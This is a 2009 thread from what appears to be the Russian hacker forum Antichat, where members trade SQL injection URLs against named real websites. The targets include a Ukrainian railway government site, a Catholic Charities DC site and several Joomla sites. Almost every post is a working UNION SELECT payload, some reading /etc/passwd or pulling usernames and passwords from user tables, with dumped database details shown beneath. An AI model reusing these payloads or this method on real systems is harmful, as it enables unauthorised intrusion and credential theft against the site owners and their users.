30.11.2009, 22:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Официальный сайт Южной железной дороги!
вывод в теге <title>
В даному случае скуль в оракле!
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+table_name+from+sys.all_tables--+
таблица AAABBB
Oracle
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+user+from+sys.user_tables--+
пользователь PZ
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+tablespace_name+from+sys.user_ta bles--+
PZTAB
пользователи
Код:
OUTLN
SYS
DBSNMP
...
таблицы системного пользователя SYS
доступ до DBA_USERS для пользователя под которым работает скрипт закрыт.
Код:
всесто limit rownum
кавычки екранируються
в запросе в скрыпте один атрибут
склейка так атрибут||chr(симовл асци)||..||..||..
Последний раз редактировалось Strilo4ka; 30.11.2009 в 22:30..
|
|
|
01.12.2009, 18:40
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
http://aquatoriya.org/news.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6+ from+information_schema.tables--
http://www.photobooth.net/art/index.php?artistID=-21+union+select+1,2,3,4,5,6,7,load_file(0x2F657463 2F706173737764),9--
Последний раз редактировалось Bramin; 02.12.2009 в 19:03..
|
|
|
|
01.12.2009, 18:52
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
С нами:
8700457
Репутация:
24
|
|
http://www.cfess.org.br/noticias_res.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12/*
Последний раз редактировалось KNR; 01.12.2009 в 18:54..
|
|
|
|
02.12.2009, 03:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
http://catalog.arena-bel.ru/index.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5--+&s=0
5.0.87-log:catalogarenabel:catalogarenabel@localhost  ort bld-freebsd7.2
Код:
partnerstehno_backs@partnerstehno_banners@partnerstehno_chapters@partnerstehno_counts@partnerstehno_cp_clons@partnerstehno_cp_links@partnerstehno_cp_linkstoclons@partnerstehno_letters@partnerstehno_links@partnerstehno_linkstocp@partnerstehno_scheduler@partnerstehno_templates@tehno_backs@tehno_banners@tehno_chapters@tehno_counts@tehno_cp_clons@tehno_cp_links@tehno_cp_linkstoclons@tehno_letters@tehno_links@tehno_linkstocp@tehno_scheduler@tehno_templates
http://alpha-avizo.com/index.php?page=search&id=B2'&type=3+union+select+1 ,2,3,4,5,6,7,8,9,10--+
5.0.77:alphaav_bp:alphaav_dhsilabs@localhost ortb ld-freebsd6.4
tables:
prop columns:
Код:
no@dt@id@org@name@phone@email@typ@txt@conf
category columns:
http://www.catholiccharitiesdc.org/find/services/index.php?id=-156+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
5.0.77:ccs-dc_org:ccsdc@rh7.axion-it.com:redhat-linux-gnu
таблицы
content@session@user@version_link
атрибуты user
user_id@email@name@password@password_change@passwo rd_forgot_key@password_forgot_key_expire
Последний раз редактировалось Strilo4ka; 02.12.2009 в 15:00..
|
|
|
|
02.12.2009, 22:16
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
http://www.geotunis.org/index_en.php?id=-5++union+select+1,2,3,4,5,6,7,8--
http://www.alfajer.com/company_details.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10--
Последний раз редактировалось Fooog; 03.12.2009 в 22:33..
|
|
|
|
03.12.2009, 22:14
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами:
8957186
Репутация:
796
|
|
http://www.huesler-nest.ch/en/news.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
5.0.32-Debian
huesler@localhost
http://www.esoterica.ru/news.php?id=-22+union+select+1,2,3,4,5--
ТИЦ 170.
Последний раз редактировалось .Varius; 11.12.2009 в 18:07..
|
|
|
|
04.12.2009, 10:55
|
|
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
С нами:
9062055
Репутация:
368
|
|
http://tdes.nnov.ru/thumbnails.php?id=-980+union+select+1,2,3,4,5,6,7,8,9,0,1,2,table_nam e,4,5+from+information_schema.tables+limit+19,1%20--&page=0
|
|
|
|
04.12.2009, 13:11
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Код:
http://www.sanfordwomenshealth.org/staff/index.php?id=&entryid=-3+union+select+1,2,3,4,5,6,7,table_name,9,10+from+information_schema.tables+/*+
Код:
http://www.trailking.com/news/index.php?newsid=-2+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://www.ve4erina.ru/services/index.php?n=-3+union+select+1,user()+--+&id=27
Код:
http://www.computertoday.net/magazine.php?mag=WinMag&mag_no=-166+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a3a,username,password,email))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+phpuserlogin_users+/*+&backyear=2007'
Код:
http://www.hydrix.com/services/index.php?id=27+union+select+1,2,3,4,5,6,7,8,9+--+
|
|
|
|
04.12.2009, 18:34
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
barrettos.info
Код:
http://www.barrettos.info/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,1,1,1,1,concat_ws(0x3a,id,usertype,username,password),1,1,1,1,1,1,1,1+from+jos_users+--
Код:
5.1.30:barrett2_jo151@localhost:barrett2_jo151
hilsonmoormanfamily.com
Код:
http://www.hilsonmoormanfamily.com/login/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,version%28%29,1,1,1,concat%28username,0x3a,password%29,1,1,1,1,1,1,1,1+from+jos_users--
Код:
5.0.81-community:hilsonm1_jo151@localhost:hilsonm1_jo151
Последний раз редактировалось nemaniak; 05.12.2009 в 01:31..
|
|
|
|
04.12.2009, 19:25
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
С нами:
9151094
Репутация:
10
|
|
[+]Printable field: 2
[+]Vuln URL: http://gpsgsm.ru/txt.php?id=200+and+0+UNION+SELECT+1,2,3,4--
[+]MySQL Info: gpsgsm@fhe.hoster.ru:4.0.27-log:gpsgsm:binjportbld-freebsd7.0
----------------------------
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
